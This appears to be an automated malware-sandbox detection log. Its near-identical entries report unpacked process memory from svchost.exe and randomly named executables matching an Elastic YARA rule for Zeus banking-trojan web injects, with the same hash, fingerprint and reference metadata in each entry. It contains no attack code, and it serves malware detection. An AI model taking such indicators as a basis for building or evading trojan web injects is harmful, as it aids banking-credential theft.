Source: 2.3.svchost.exe.b00000.51.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.37.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 9.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.9c2000.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 30.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.25f2000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 16.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2b80000.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.51.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 24.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2560000.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.18.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.48.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 27.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2e82000.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.37.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.3.UMwpXhA46R.exe.7081e8.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f380000.11.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.22.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.18.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.27.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.24.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 7.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.1040000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 6.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.11e2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.26.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.3.UMwpXhA46R.exe.7031e8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.35.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 21.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2ab2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.54.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.41.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.3.UMwpXhA46R.exe.708de8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3c40000.17.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.35.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.25.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.886c00.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.41.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.32.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 36.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.1552000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.407000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 27.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.3040000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.2.UMwpXhA46R.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.31.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.44.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.15.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.39.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
